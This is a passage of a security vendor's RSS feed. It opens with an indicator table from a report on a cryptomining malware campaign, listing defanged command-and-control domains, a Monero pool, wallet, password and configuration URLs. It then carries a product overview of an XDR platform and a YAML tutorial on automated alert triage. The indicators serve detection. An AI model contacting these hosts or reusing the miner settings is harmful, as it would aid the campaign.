<tr>
<th align="left">Versions</th>
<th align="left"><code>1.5.1</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code>&lt;br /&gt;<code>wndlogon.itemdb[.]com</code>&lt;br /&gt;<code>wndlogon.ydns[.]eu</code>&lt;br /&gt;<code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>18-04-25</code></td>
</tr>
</tbody>
</table>
<p><strong>SilentCryptoMiner</strong></p>
<table>
<thead>
<tr>
<th align="left">Mining Pool</th>
<th align="left"><code>gulf.moneroocean[.]stream:10128</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Wallet</td>
<td align="left"><code>83Q1PKZ5yXsP8SCqjV3aV7B3UoBB3skPp49G1VnnGtv5Y5EUbFQTXvzR9cZshBYBBfd8Dm1snkkud431pdzEZ2uJTad1CiC</code></td>
</tr>
<tr>
<td align="left">Password</td>
<td align="left"><code>CPUrig</code></td>
</tr>
<tr>
<td align="left">Mining proxy/fallback</td>
<td align="left"><code>172.94.15[.]211:5443</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>softappsbase[.]top</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>autoupdatewinsystem[.]top</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>softwaredatabase[.]xyz</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://softappsbase[.]top/UnammnrsettingsCPU.txt</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://autoupdatewinsystem[.]top/UWP1/cpu.txt</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://softwaredatabase[.]xyz/UnammnrsettingsCPU.txt</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://softappsbase[.]top/UnamWebPanel7/api/endpoint.php</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://autoupdatewinsystem[.]top/UWP1/api/endpoint.php</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://softwaredatabase[.]xyz/UnamWebPanel7/api/endpoint.php</code></td>
</tr>
</tbody>
</table>
<p>Here is a <a href="https://gist.github.com/jiayuchann/6728db5acef7b2793a6afa77b600c7c6">GitHub Gist</a> of a list of sample hashes.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/fake-installers-to-monero.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Investigating from the Endpoint Across Your Environment with Elastic Security XDR]]></title>
            <link>https://www.elastic.co/kr/security-labs/investigating-from-the-endpoint-across-your-environment</link>
            <guid>investigating-from-the-endpoint-across-your-environment</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article highlights how Elastic Security XDR unifies endpoint protection with multi-domain security analytics to help analysts trace and contain multi-stage attacks across hybrid and cloud environments.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Security investigations rarely stay confined to a single host. Today’s attackers increasingly use automation and AI to compress multi-stage attacks into minutes, turning what once unfolded over days into coordinated activity across endpoints, identities, workloads, and cloud services within minutes.</p>
<p>While many attacks begin on an endpoint, investigators must quickly determine how that activity spreads across the environment. In many environments, per-endpoint licensing limits how broadly protection and telemetry can be deployed, creating protection gaps during these investigations.</p>
<p>Elastic Security XDR is built around that reality. It includes best-in-class endpoint protection, without per-endpoint licensing constraints, in an agentic security operations platform where endpoint telemetry, infrastructure signals, and supporting artifacts can be analyzed together.</p>
<p>This post explores how Elastic Security XDR supports investigations across endpoints, workloads, and the broader environment, highlighting tools and workflows that help analysts collect evidence, pivot across telemetry, and respond efficiently.</p>
<h2>Endpoint at the heart of XDR</h2>
<p>The <a href="https://www.elastic.co/kr/resources/security/report/global-threat-report">2025 Elastic Global Threat Report</a> reveals that with 90% of malware targeting Windows, and browsers acting as the 'primary battleground', host-level visibility is essential to stopping a breach before it scales to the cloud. Elastic Defend, Elastic Security’s native endpoint protection, powers XDR from the endpoint outward. It not only prevents threats across Windows, macOS, and Linux, but also generates rich, investigation-grade telemetry that gives analysts the context they need to understand what happened on a host.</p>
<p>As activity occurs, Elastic Defend captures system events including process execution, file changes, network connections, and related artifacts. This telemetry forms the foundation for broader investigations, allowing analysts to correlate endpoint behavior with activity across workloads, identities, and other systems.</p>
<p>Multiple detection layers protect against malware, ransomware, fileless techniques, and other malicious behaviors, using both static and behavioral analysis. Independent validation from the <a href="https://www.elastic.co/kr/blog/av-comparatives-business-security-test-2025">AV-Comparatives Business Security Test</a> confirms Elastic’s effectiveness; in the 2025 test cycle, Elastic Security was the only vendor that blocked every tested threat, earning perfect scores in both Real-World Protection and Malware Protection.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image2.png" alt="" /></p>
<p>Elastic also takes a principled approach to openness. Unlike many endpoint security tools that operate as a black box, Elastic publishes detection and prevention logic in an <a href="https://github.com/elastic/protections-artifacts">open repository</a>. This transparency lets analysts understand how protections work, validate them in their own environments, and prioritize high-risk gaps. By empowering users with visibility and insight, Elastic ensures security teams can act with confidence and maximize the value of their investigations.</p>
<h2>Beyond the endpoint: expanding the investigation</h2>
<p>Attacks rarely stay confined to a single host. Credentials may be compromised, workloads modified, or activity spread across cloud services and infrastructure. To fully understand an incident, analysts need to correlate endpoint activity with signals from the broader environment.</p>
<p>Elastic Security XDR enables this by bringing multiple data sources into the same analysis environment through <a href="https://www.elastic.co/kr/integrations/data-integrations?solution=all-solutions&amp;category=security">hundreds of integrations</a> with popular security tools and data sources. Endpoint telemetry,whether collected by Elastic Defend or another EDR platform, can be analyzed alongside cloud activity, identity events, network telemetry, and third-party logs, without forcing organizations into a closed security stack. Elastic provides the <a href="https://www.elastic.co/kr/docs/reference/ecs">common schema</a> and unified detection engine required to normalize disparate signals, allowing analysts to bypass manual data mapping and immediately pivot between sources to follow how activity moves across users, systems, and infrastructure.</p>
<p>Centralized <a href="https://elastic.github.io/detection-rules-explorer/">detection rules</a> operate across the unified dataset in the security platform, complementing <a href="https://github.com/elastic/protections-artifacts">real-time protections</a> that run directly on the endpoint. They enable alerts to reflect correlated activity across multiple domains. Suspicious process activity on a host can be matched with identity events, cloud API calls, or network behavior, helping analysts determine whether an event is isolated or part of a larger attack chain.</p>
<p>Container workloads highlight another way XDR extends investigations. <a href="https://www.elastic.co/kr/security-labs/getting-started-with-defend-for-containers">Elastic Defend for Containers</a> monitors runtime behavior inside containerized environments, detecting suspicious activity such as unexpected process execution, privilege escalation, or access to sensitive resources. By connecting endpoint behavior to the broader environment, Elastic Security XDR gives analysts the visibility needed to scope incidents accurately, prioritize critical threats, and respond with confidence.</p>
<h2>Reconstructing the attack path</h2>
<p>After relevant telemetry is collected, analysts need to piece together what happened and how the attack progressed. Investigations involve pivoting between events, validating hypotheses, and assembling a complete timeline of activity across the environment.</p>
<p>Elastic Security XDR provides <a href="https://www.elastic.co/kr/docs/solutions/security/investigate">investigation tools</a> designed to support this process. Visual Event Analyzer, Session View, and Timeline allow analysts to explore relationships between events, trace execution chains, and correlate activity across datasets while maintaining investigative context.</p>
<p>Visual Event Analyzer offers a graphical view of process relationships, helping analysts spot suspicious parent-child behavior and understand execution flows. Session View reconstructs activity within a process session, showing commands, network connections, and other actions as they unfolded. Timeline acts as an investigative workspace where analysts collect and correlate events from multiple sources, refine queries, and build a coherent attack narrative.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image5.png" alt="Investigate alerts &amp; processes with Event Analyzer" title="Investigate alerts &amp; processes with Event Analyzer" /></p>
<p>Together, these tools help analysts validate hypotheses faster, deepen analysis, and enable more confident response decisions.</p>
<h2>Agentic investigation: discovery, summarization, and natural language querying</h2>
<p>Elastic Security’s AI-driven investigative workflows help analysts keep pace with modern attacks by accelerating investigation and surfacing connected activity across the environment. Attack Discovery identifies connected alerts across endpoints, workloads, cloud services, and integrated third-party data, helping analysts uncover hidden attack chains without manually correlating events.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image6.png" alt="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." title="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." /></p>
<p>Once an investigation is underway, Elastic AI Assistant and Agent Builder enable natural-language workflows that let analysts interact with data and automation more efficiently. Analysts can summarize observations, ask questions about entities and activity, and move seamlessly from supporting signals to containment or remediation actions. With the introduction of <a href="https://www.elastic.co/kr/security-labs/agent-skills-elastic-security">agent skills</a>, teams can now extend these workflows with reusable, task-specific capabilities, such as alert triage, rule management, and case handling, allowing the assistant to execute complex, multi-step security tasks with the same consistency and repeatability as traditional automation, but through a conversational interface.</p>
<p>In practice, these capabilities reduce the time from an initial alert to full incident understanding, allowing SOC teams to respond faster, focus on high-priority threats, and act with confidence.</p>
<h2>Built-in forensics and host artifact collection</h2>
<p>During incident response, investigators often need to retrieve additional host artifacts to confirm attacker behavior, identify persistence, or validate user activity.</p>
<p>Elastic Security XDR includes built-in forensic capabilities that allow responders to collect investigative artifacts directly from affected hosts, reducing the need for separate forensic tooling during common investigative tasks. Elastic Defend supports capturing <a href="https://www.elastic.co/kr/docs/solutions/security/endpoint-response-actions#memory-dump">memory snapshots</a> for deeper forensic analysis, while <a href="https://www.elastic.co/kr/docs/solutions/security/investigate/osquery">Osquery Manager</a> enables analysts to run targeted queries to gather and examine host artifacts as part of an investigation.</p>
<p>Forensic visibility is further extended through ongoing collaboration with Osquery. By extending Osquery-based forensics with supplemental tables for common investigative artifacts, Elastic helps uncover evidence such as browser history, AMCache records, and jumplist artifacts. These sources make it easier for analysts to examine user activity and execution history on Windows systems during an investigation. Also available is library of prebuilt forensic queries and packs to extract common investigative artifacts across Windows, macOS, and Linux, including:</p>
<ul>
<li>process listings and execution context</li>
<li>scheduled tasks, startup items, and persistence mechanisms</li>
<li>shell history and command execution artifacts</li>
<li>network configuration and connectivity context</li>
<li>file hashes and other execution-related artifacts</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image3.png" alt="Osquery forensic packs within Elastic Security" title="Osquery forensic packs within Elastic Security" /></p>
<p>These capabilities turn artifact collection into an embedded  step of the investigation, rather than a separate workflow, so teams can confirm what happened all in one platform and act sooner.</p>
<h2>Response actions that keep investigations moving</h2>
<p>Once investigators confirm malicious behavior, the priority shifts to containment and remediation. Elastic Security XDR enables analysts to take immediate action directly from the investigation context, isolating a host, terminating suspicious processes, collecting a file from the endpoint, or running a response script to collect additional evidence needed to complete the analysis.</p>
<p>For organizations using third-party EDRs, Elastic Security XDR can orchestrate containment and response across mixed environments, allowing teams to keep investigation, enforcement, and incident record-keeping anchored in a single platform.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image4.png" alt="Isolating a CrowdStrike-managed host directly from Elastic Security" title="Isolating a CrowdStrike-managed host directly from Elastic Security" /></p>
&lt;div className=&quot;youtube-video-container&quot;&gt;
  &lt;iframe width=&quot;560&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/Spgx80WKaqs?si=3XMt0uFsbNEtpcHv&quot; title=&quot;Isolating a CrowdStrike-managed host directly from Elastic Security&quot; frameBorder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot; referrerPolicy=&quot;strict-origin-when-cross-origin&quot; allowFullScreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
<h2>Controlling removable media with Device Control</h2>
<p>Investigations often uncover risk paths beyond traditional malware, such as removable media usage or potential USB-based exfiltration. Elastic Security XDR’s Device Control capabilities let teams manage and enforce removable media policies across endpoints, reducing attack surface and preventing unauthorized data transfer.</p>
<p>Device Control also allows teams to automatically block USB devices and maintain a trusted set of approved devices, ensuring policies are enforced consistently across all endpoints.</p>
<h2>Scaling response with Elastic Workflows</h2>
<p>Incident response often follows repeatable steps. When an alert fires, teams enrich it, gather evidence, contain affected hosts, open cases, notify responders, and document decisions, ensuring investigations persist across handoffs and shift changes.</p>
<p><a href="https://www.elastic.co/kr/search-labs/blog/elastic-workflows-automation">Elastic Workflows</a> gives teams a way to encode those steps as a reusable playbook that runs inside the Elastic platform. Workflows are defined declaratively in YAML in Kibana, and can be triggered in multiple ways: when a Kibana alerting rule fires, on a schedule, or manually on demand.</p>
<p>From there, a workflow can execute a sequence of steps that look a lot like what an analyst would do manually:</p>
<ul>
<li>Query Elastic data (including ES|QL), transform results, and branch based on conditions</li>
<li>Create or update a Case, attach supporting context, and keep an auditable record of what was collected and why.</li>
<li>Notify downstream systems (Slack, Jira, PagerDuty, and other services) using connectors you’ve already configured, or call internal/external APIs via HTTP steps.</li>
</ul>
<p>This becomes especially impactful when paired with endpoint response capabilities. When an alert fires, teams can automatically isolate the host and kick off a standardized evidence bundle - capture a memory dump, collect a suspicious file (get-file), and list running processes - so responders have what they need immediately.</p>
<p>The net effect is faster execution of the first steps in incident response, while investigations follow consistent playbooks across analysts and shifts. Instead of relying on memory and manual checklists, Workflows helps enforce a repeatable investigation standard and makes it easier to scale response when alert volume spikes.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image1.png" alt="Alert Triage workflow built with Elastic Workflows native automation." title="Alert Triage workflow built with Elastic Workflows native automation." /></p>
<h2>Elastic Security Labs - Research that powers real-world defenses</h2>
<p>Elastic Security is informed by the work of <a href="https://www.elastic.co/kr/security-labs/about">Elastic Security Labs</a>, a team dedicated to studying real adversary behavior and translating those findings into practical detection and investigation guidance. Threat Command tracks emerging techniques, malware activity, and endpoint tradecraft, then turns that research into updates that matter in day-to-day security operations: new and refined detection rules, improvements to prevention logic, and clearer guidance on how to investigate what you’re seeing.</p>
<p>Elastic Security Labs also publishes technical write-ups and analyses to help the broader community understand how threats operate in the wild. For defenders, that research provides useful context behind detections - why a technique matters, what evidence to look for, and how to scope impact once an alert fires.</p>
<h2>Tying it all together</h2>
<p>As a core capability of our agentic security operations platform, Elastic Security XDR unifies traditionally siloed defenses to tackle the speed and complexity of modern threats. An initial host-based signal can quickly spread across endpoints, identities, and cloud services. Agentic workflows and agent skills help analysts investigate and respond at machine speed. Analysts no longer need to stitch together disconnected tools - they can follow attacker activity throughout the environment, combining endpoint prevention with autonomous investigative and response capabilities in a single platform.</p>
<h2>Learn More</h2>
<p>Visit <a href="https://elastic.co/security/xdr">elastic.co/security/xdr</a> to learn more. Try a free <a href="https://cloud.elastic.co/serverless-registration">Elastic Security trial</a>, explore Elastic Defend with our <a href="https://videos.elastic.co/watch/wVJRXJQR5orNBEkjgUbVRq">Getting Started video</a>, or practice with real malware at <a href="https://ohmymalware.com">ohmymalware.com</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/investigating-from-the-endpoint-across-your-environment.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Security Automation with Elastic Workflows: From Alert to Response]]></title>
            <link>https://www.elastic.co/kr/security-labs/security-automation-with-elastic-workflows</link>
            <guid>security-automation-with-elastic-workflows</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A practical guide to building intelligent, automated security playbooks with Elastic Workflows.]]></description>
            <content:encoded><![CDATA[<h2>The daily loop</h2>
<p>An alert fires. You open it. You read through the details. You gather context from the surrounding activity. You check for related signals across your environment. You decide what it means and what to do next. Sometimes you escalate. Sometimes you close it and move on.</p>
<p>You do this dozens of times a day. The steps are almost always the same. The data you need is already in your SIEM. The actions you take are predictable. But the work is still manual.</p>
<p>This is the kind of work that automation should handle. Not because it's hard, but because it's repetitive, and every minute spent on repetitive manual triage is a minute not spent on the alerts that actually need a human.</p>
<p>Elastic Workflows brings that automation into the SIEM itself. No separate tool. No integration to build. Your detection rule fires, and a workflow runs, with direct access to your alerts, cases, and security data.</p>
<p>This blog post walks through building a security playbook with Workflows, step by step. We'll start simple and build up to a workflow that runs when an alert fires, checks threat intel, gathers context, creates cases, notifies the team, and brings in AI when the investigation calls for it.</p>
<p>If you're new to Workflows, the <a href="https://www.elastic.co/kr/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> blog and <a href="https://www.youtube.com/watch?v=Tu505Zn1wUc">video</a> cover the core concepts of Workflows. This post focuses on applying these concepts in a security context.</p>
<h2>Quick orientation</h2>
<p>Workflows are YAML definitions that run inside Kibana. You define what should happen, and the platform handles execution. At a high level, a workflow is composed of three main parts: triggers (when it runs), steps (what it does), and data flow (how information moves between steps).</p>
<p><a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/triggers"><strong>Triggers</strong></a> decide when the workflow runs. An alert trigger runs on a detection. A scheduled trigger runs on a cadence. A manual trigger runs on demand. A workflow can have more than one.</p>
<p><a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/steps"><strong>Steps</strong></a> define what the workflow does. They run in order and can use outputs from earlier steps. They can query data in <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/steps/elasticsearch">Elasticsearch</a>, update alerts and cases in <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/steps/kibana">Kibana</a>, and <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/steps/external-systems-apps">call external systems</a> like sending a Slack message or scanning a hash on VirusTotal. They can also apply logic such as conditionals or loops, and use <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/steps/ai-steps">AI</a> for tasks like summarizing text, prompting an LLM, or invoking agents when deeper reasoning is needed.</p>
<p>This is the toolkit. With these primitives, you can build workflows that take a signal, gather context, and drive a response.</p>
<h2>Building a security playbook</h2>
<p>We'll build an alert triage workflow incrementally. Each section adds a capability, and by the end, you'll have a working playbook that handles the full triage loop.</p>
<h3>Start with the trigger</h3>
<p>Security workflows start with an event. It could be an alert, a case update, a user action, or a scheduled check. The workflow takes that signal, gathers context, and decides what to do next.</p>
<p>We’ll start with alert triage. It’s the most common path, and it shows the full loop end to end. Each section adds a capability, and by the end, you’ll have a working playbook.</p>
<p>Here’s a minimal workflow with an alert trigger:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  # we'll build these out
</code></pre>
<p>The <code>alert</code> trigger connects this workflow to detection rules. You link a specific rule to this workflow from the rule's <strong>Actions</strong> settings in Kibana. When the rule fires, the workflow runs and receives the full alert context through the <code>event</code> variable. That includes <code>event.alerts</code> (the alert documents), <code>event.rule</code> (the rule metadata), and every field on the alert.</p>
<p>From here, you start adding steps.</p>
<h3>Check threat intel</h3>
<p>The first real step: take the file hash from the alert and check it against VirusTotal. Workflows have a built-in VirusTotal connector, so you don't need to construct HTTP requests or manage API keys in your YAML (connector credentials like VirusTotal API keys or Slack tokens are configured once in the connector under <strong>Stack Management &gt; Connectors</strong>):</p>
<pre><code class="language-yaml">  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true
</code></pre>
<p>Every step in a workflow follows a simple, consistent structure. It starts with a <code>name</code>, which gives the step a clear identity, and a <code>type</code>, which defines the action being performed. In this case, the step calls the VirusTotal file hash scan capability. Because this is a connector-backed action, it also includes a <code>connector-id</code>, which tells the workflow which configured integration to use, including its credentials.</p>
<p>The <code>with</code> block is where you pass inputs into the step. Each step type defines the parameters it accepts. Here, you provide the file hash to scan. Rather than hardcoding values, workflows use a built-in templating engine powered by LiquidJS. The <code>{{ }}</code> syntax lets you <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/data#workflows-dynamic-values">reference data from the execution context</a>, so the hash is pulled directly from the alert that triggered the workflow.</p>
<p>Finally, the <code>on-failure</code> block defines how the step behaves if something goes wrong. In this case, it retries twice with a short delay and continues execution even if the lookup fails. This is important in production workflows, where a transient external API issue should not block the entire triage process.</p>
<h3>Gather context with ES|QL</h3>
<p>Next, query for related alerts on the same host. ES|QL runs directly against your security indices, so there's no API bridging or credential management:</p>
<pre><code class="language-yaml">  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json
</code></pre>
<p>This tells you whether the host has been generating other alerts, which rules triggered, and which users were involved. That context is included in the case description and informs the severity assessment later.</p>
<p>The same approach works for any enrichment that touches data in Elasticsearch: looking up a user's first-seen date, checking how many times a hash has appeared in your logs, or pulling the process tree from endpoint data. If the data is in your cluster, ES|QL can get it.</p>
<h3>Branch on findings</h3>
<p>Now the workflow needs to decide what to do. If VirusTotal flagged the file as malicious, create a case and respond. If not, close the alert as a false positive:</p>
<pre><code class="language-yaml">  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      # true positive path: steps below
    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>The <code>if</code> step evaluates a condition and runs different steps depending on the result. The false positive path closes the alert in a single step. The true positive path continues below.</p>
<h3>Create a case</h3>
<p>When the alert is confirmed malicious, open a case with context from previous steps:</p>
<pre><code class="language-yaml">      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null
</code></pre>
<p><a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/data#workflows-dynamic-values">Liquid templating</a> pulls data from the alert (<code>event</code>), from the VirusTotal results (<code>steps.check_virustotal.output</code>), and from the ES|QL query (<code>steps.related_alerts.output</code>). Every field from every previous step is available to every subsequent step.</p>
<h3>Notify the team</h3>
<p>Send a Slack message so the team knows a confirmed case is open:</p>
<pre><code class="language-yaml">      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}
</code></pre>
<p>Slack is one option. Jira, ServiceNow, PagerDuty, Microsoft Teams, email, and Opsgenie are all supported as connector steps.</p>
<h3>The complete workflow</h3>
<p>Here's the full workflow assembled:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true

  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json

  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null

      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}

    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>That's the triage loop, automated. Alert fires, threat intel checked, context gathered, decision made, case created, team notified. Every execution is logged and auditable.</p>
<p>This is a starting point. The <a href="https://github.com/elastic/workflows/blob/main/workflows/security/response/traditional-triage.yaml">traditional-triage.yaml</a> in the Elastic Workflows library on GitHub goes further: it isolates the host, looks up the on-call analyst, creates a dedicated Slack channel, assigns the case, and posts a rich incident summary. Same patterns, more steps.</p>
<h2>Adding AI to the playbook</h2>
<p>The workflow above handles a defined path. If the hash is malicious, do X; otherwise, do Y. That covers a lot of triage work. But not every alert fits a clean branching condition, and not every case description should be a list of raw fields.</p>
<p>Workflows include AI steps that handle the parts where structured logic runs out. There are three, and they work together.</p>
<h3>Classify: let AI drive the branching</h3>
<p>Instead of branching on a VirusTotal score threshold, use <code>ai.classify</code> to categorize the alert. It considers the full alert context, not just a single number:</p>
<pre><code class="language-yaml">  - name: classify_alert
    type: ai.classify
    with:
      input: &quot;${{ event }}&quot;
      categories:
        - malware
        - phishing
        - lateral_movement
        - data_exfiltration
        - false_positive
      instructions: |
        Classify this security alert based on the alert details,
        rule name, and affected entities.
      includeRationale: true
</code></pre>
<p>The output is structured: <code>steps.classify_alert.output.category</code> returns a single string like <code>&quot;malware&quot;</code> or <code>&quot;false_positive&quot;</code>. That drives the <code>if</code> condition directly. The rationale explains why, and you can include it in the case for audit purposes.</p>
<h3>Summarize: write case descriptions that adapt</h3>
<p>Rather than templating raw field values into a case description, use <code>ai.summarize</code> to generate a readable overview. Run it once before case creation for the initial description, and once after the agent investigation to update the description with the full picture:</p>
<pre><code class="language-yaml">  - name: initial_summary
    type: ai.summarize
    with:
      input: &quot;${{ event }}&quot;
      instructions: |
        Write a one-paragraph overview of this security alert.
        State what was detected, on which host, by which user, and the severity.
        Do not include recommendations. Just the facts.
      maxLength: 300
</code></pre>
<p>The summary adapts to whatever fields are present on the alert, so you don't need to account for every possible field combination in your Liquid templates. Use <code>steps.initial_summary.output.content</code> in the case description and the Slack notification.</p>
<h3>Agent: investigate what the playbook can't</h3>
<p>The <code>ai.agent</code> step invokes an Agent Builder agent. Unlike classify and summarize, an agent has access to tools. It can query your indices, check threat intel, correlate signals across data sources, and reason about what it finds:</p>
<pre><code class="language-yaml">  - name: escalate_to_agent
    type: ai.agent
    agent-id: &quot;security-agent&quot;
    create-conversation: true
    with:
      message: |
        Investigate this alert. Search for related activity on this host,
        check for persistence mechanisms and lateral movement,
        and determine the full scope of the incident.
        Alert: {{ event | json }}
        Classification: {{ steps.classify_alert.output.category }}
        VirusTotal: {{ steps.check_virustotal.output | json }}
        Related alerts: {{ steps.related_alerts.output | json }}
    timeout: 10m
</code></pre>
<p>The agent processes the input, calls whatever tools it needs, and returns its findings. The workflow waits, then continues with the next steps: adding the investigation to the case, notifying the team, and updating the case description with a concise summary of what the agent found.</p>
<p>Setting <code>create-conversation: true</code> persists the conversation, so the workflow can fetch the agent's reasoning trail and add it to the case as a structured comment with clickable links to each query it ran. And the analyst gets a direct link to pick up the conversation with the agent if they want to dig deeper.</p>
<h3>Putting it together</h3>
<p>In the full version of this workflow, the three AI steps work in sequence:</p>
<ol>
<li><strong>Classify</strong> the alert to drive the triage decision</li>
<li><strong>Summarize</strong> the alert for the initial case description and Slack notification</li>
<li><strong>Agent</strong> investigates the full scope: persistence, lateral movement, IOCs, affected systems</li>
<li><strong>Summarize</strong> again, this time distilling the agent's findings into a concise, updated case description</li>
</ol>
<p>The case starts with a clean factual overview and evolves into a comprehensive summary as the investigation completes. The agent's full analysis and reasoning trail live as case comments for analysts who want the details.</p>
<p>The complete workflow, including the AI investigation pipeline with reasoning trails, clickable Discover links, and follow-up Slack notifications, is available in the <a href="https://github.com/elastic/workflows">Elastic Workflows library on GitHub</a>.</p>
<h2>Workflows as agent tools</h2>
<p>The integration between Workflows and Agent Builder works in both directions. Workflows can call agents (as shown above). And agents can call workflows.</p>
<p>When you expose a workflow as a tool in Agent Builder, an agent can invoke it during a conversation. The agent decides what needs to happen, and the workflow handles the execution reliably and repeatably.</p>
